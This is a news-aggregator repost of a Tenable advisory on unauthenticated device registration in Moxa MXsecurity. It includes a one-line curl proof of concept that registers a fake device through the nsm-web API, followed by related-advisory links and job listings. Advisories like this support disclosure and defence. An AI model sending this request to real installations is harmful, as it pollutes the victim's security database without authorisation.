all InfoSec news
Moxa MXsecurity Unauthenticated Device Registration
Sept. 5, 2023, 1:14 p.m. | Jimi Sebree
Tenable Research Advisories www.tenable.com
A security issue regarding improper access controls has been discovered in Moxa MXsecurity V1.0.1-23021705. It allows an unauthenticated remote attacker to register/add devices via the nsm-web application. This pollutes the MXsecurity sqlite database and the nsm-web UI.
Proof of Concept
curl -k -H 'Content-Type:application/json' -d '{"mac":"11:11:11:11:11:11", "serialNumber":"1234", "modelName":"aaa", "hostname":"device_1", "firmwareVersion":"1.1", "location":"location_1"}' 'https:///api/v1/devices/register'
Jimi Sebree
Tue, 09/05/2023 - 09:14
access access controls application attacker concept controls database device devices issue moxa nsm proof register registration security sqlite sqlite database unauthenticated web web application
More from www.tenable.com / Tenable Research Advisories
Fluent Bit Memory Corruption Vulnerability
2 weeks, 1 day ago |
www.tenable.com
Cross-Site Scripting in WordPress RSS Aggregator Plugin
2 weeks, 4 days ago |
www.tenable.com
Solidus Stored Cross-Site Scripting
2 weeks, 4 days ago |
www.tenable.com
Delta Electronics DIAEnergie CEBC.exe Multiple Vulnerabilities
3 weeks, 5 days ago |
www.tenable.com
Approach.App Multiple Vulnerabilities
1 month, 1 week ago |
www.tenable.com
Path Traversal Affecting Multiple CData Products
1 month, 3 weeks ago |
www.tenable.com
Jobs in InfoSec / Cybersecurity
CyberSOC Technical Lead
@ Integrity360 | Sandyford, Dublin, Ireland
Cyber Security Strategy Consultant
@ Capco | New York City
Cyber Security Senior Consultant
@ Capco | Chicago, IL
Sr. Product Manager
@ MixMode | Remote, US
Corporate Intern - Information Security (Year Round)
@ Associated Bank | US WI Remote
Senior Offensive Security Engineer
@ CoStar Group | US-DC Washington, DC